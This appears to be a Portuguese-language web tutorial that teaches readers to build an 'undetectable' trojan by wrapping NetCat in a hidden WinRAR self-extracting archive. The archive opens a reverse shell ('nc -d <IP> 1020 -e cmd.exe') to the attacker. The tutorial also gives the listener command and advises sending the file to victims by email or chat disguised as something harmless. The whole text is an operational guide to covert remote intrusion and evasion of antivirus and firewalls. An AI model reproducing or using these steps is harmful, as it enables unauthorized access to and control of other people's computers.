Translate to English Translate to Spanish Translate to French Translate to German Google-Translate-Portuguese to Italian Translate to Russian Translate to Chinese Translate to Japanese
Pergunta
O que voce acha do nosso visual do site ??
Ruim
Bom
Rasuavel
Parabens
Legal
Otimo
Maravilhoso
Execente
Ver Resultados

Rating: 2.6/5 (9 votos)



ONLINE
2









Total de visitas: 1874

Tuto NetCat

Tuto NetCat

 Criando Um trojan indetectável usando o NetCat e o WinRar

Com certeza uma das maiores dificuldades de se fazer um ataque por trojan, está na camuflagem do "bixo", pois os anti-vírus estão cada vez mais avan´ados, tornando a invasão por trojan algo muito difícil, pois para camuflar o mesmo teríamos que entender a fundo o a estrutura dos executáveis para windows, cabe´alhos PE, sem contar com programa´ão em assembly para podermos editar o trojan usando um editores hexadecimais e debuggers, para deixá-lo invisível aos olhos do ainti-vírus, é claro que há exce´ões que você poderá editar apenas usando um explorador de PE como o ResourceHacker. Então, se você conhece todos os assuntos citados anteriormente, OK você com certeza poderá fazer com que seu trojan passe despercebido pelo anti-vírus, mas... e o Firewall? Qual será o truque para burla-lo? Bom, acho que já está na hora de te apresentar uma técnica de cria´ão de trojan que faz o mesmo passar despercebido diante destes dois sistemas de prote´ão, esta técnica consiste em compactar o executável do NetCat (nc.exe) usando o WinRar e usando as op´ões de SFX do mesmo nos permitirá criar um trojan que fa´a conexão reversa, indetectável tanto aos olhos do anti-vírus como do firewall, Por que? Isso vou te explicar no decorrer deste artigo, Seja bem vindo!

 O que é Conexão Reversa?

A conexão reversa é um tipo de invasão parecida com uma invasão por trojan, só que ao invés de o hacker se conectar ao alvo, como é feito tipicamente usando trojans, o alvo é quem se conecta ao hacker, dando-lhe total acesso a máquina invadida e fazendo com que bloqueios como firewalls sejam facilmente burlados e também é muito útil quando se quer invadir um computador que esteja na rede interna, já que a vítima é quem se conecta ao invasor.

 Sobre o NetCat

O NetCat que é considerado pelos hackers o canivete suí´o do TCP/IP, devido a sua incrível flexibilidade, com o NC(NetCat), podemos fazer desde uma simples conexão a um host até um brute force por wordlist, para quebrar senhas de um determinado servi´o.

Você pode baixar o NetCat para Windows em Somente usuários registrados poderão ver os links.

A maioria das distros linux já vem com essa ferramenta pré-instalada, mas caso não venha você poderá baixa-lá em Somente usuários registrados poderão ver os links.

 Sobre o WinRar

WinRAR parece nome de super-herói mas é o nome da versão para Windows do compactador de arquivos RAR.

O WinRar para Windows em Português do brasil pode ser baixado em Somente usuários registrados poderão ver os links.

Por que indetectável?

Primeiro vou explicar por que o trojan criado usando esta técnica é indetectável pelo o anti-vírus depois explico porque o mesmo é indetectável pelo firewall.

 Anti-vírus:

Simples, nenhum anti-vírus, (pelo menos os do meu conhecimento) julgam o NetCat e o WinRar como programas nocivos. Por isso quando um anti-vírus faz uma varredura em um trojan feito usando esta técnica, ele só vai encontrar um executável criado pelo WinRar com o NetCat dentro dele compactado, e não vai emitir avisos pois trata-se de um programa inócuo (aos olhos do anti-vírus).

 Firewall:

Como este trojan vai usar conexão reversa, nós não vamos ter que nos preocupar com firewalls porque a maioria dos firewall bloqueiam programas que queiram abrir portas, não os que simplesmente querem se conectar a uma determinada porta que já esteja aberta. Resumindo: Os firewalls se preocupam mais em proteger de fora pra dentro do que de dentro pra fora. Não entendeu? Então eu te explico melhor: Se você instala um trojan convencional que tente abrir uma porta na máquina da vítima para que o hacker se conecte, o firewall com certeza vai te bloquear, mas se você envia um trojan que vá se conectar a uma porta já aberta no seu computador (neste caso você é o invasor), dificilmente o firewall vai te bloquear.

 Mãos a Obra!

Agora que já conhecemos estas duas magníficas ferramentas, vamos ao que realmente interessa, vamos iniciar a cria´ão do nosso trojan, então siga o passo-a-passo abaixo, mas "use com modera´ão" wink.gif

 Após baixar e descompactar o NetCat, abra a pasta onde você descompactou os arquivos do NetCat e compacte apenas o arquivo nc.exe usando o WinRar.

 Abra o Arquivo compactado, clicando duas vezes sobre o mesmo e em seguida clique no botão SFX, e logo após em "Op´ões Avan´adas de SFX".

 Agora em Caminho para extra´ão, informe o diretório onde você quer que o arquivo seja extraído, nos meus testes eu coloquei c:windowssystem32. No grupo Configura´ões do Programa e no campo Executar após a extra´ão informe os seguintes parâmetros:

 nc -d 192.168.28.2 1020 -e cmd.exe - isso fará com que o assim que executado o trojan se conecte a você.

 Onde o IP (192.168.28.2) deverá ser substituído pelo seu, já que é a vítima que vai se conectar a você, e você também poderá substituir a porta (que está logo após o IP) por outra de sua preferência.

 Agora clique na Aba Métodos

   No Grupo de op´ões Método de espera, marque a op´ão Ocultar tudo, esta op´ão serve para que o NetCat seja executado em segundo plano, para que o alvo não perceba que está rodando um programa malicioso no seu computador. Logo em seguida no grupo de op´ões Métodos de Substitui´ão, marque a op´ão Ignorar arquivos existentes para que o WinRar não nos dedure.

 Clique na Aba Texto e ícone e escolha um ícone para o executável do seu trojan, clicando em Procurar.

 Finalmente clique em OK nas duas janelas abertas e em seguida feixe o WinRar e Pronto! O seu trojan indetectável já está pronto, agora no seu computador vamos configurar o NetCat para que ele fique escutando em uma determinada porta (nos meus testes ou configurei a porta 1020). Veja abaixo como fazer isto:

Copei o arquivo nc.exe para a pasta c:windowssystem32

Vá no menu Iniciar >> Executar >> Digite "cmd" (sem as aspas)

E agora vamos deixar o NetCat na escuta na porta 1020 (lembre-se que tem que ser a que você configurou quando criava o trojan). No prompt de comando digite:

  nc -l -n -p 2525 -vv

 Em seguida ele ficará assim:

C:Documents and SettingsAlison RobsonDesktop c111nt>nc -l -n -p 1020 -vv

listening on any 1020 ...

 O NetCat já está na escuta, apenas esperando pela conexão do seu alvo. Agora só te resta enviar o trojan para o seu alvo por eMail, Chat, etc, como se fosse algo inofensivo e esperar que ele o execute, pois no mesmo instante em que o trojan é executado ele se conectará instantaneamente a você te dando de presente um belo Shell, como o da representa´ão abaixo:

 C:Documents and SettingsAlison RobsonDesktop c111nt>nc -l -n -p 1020 -vv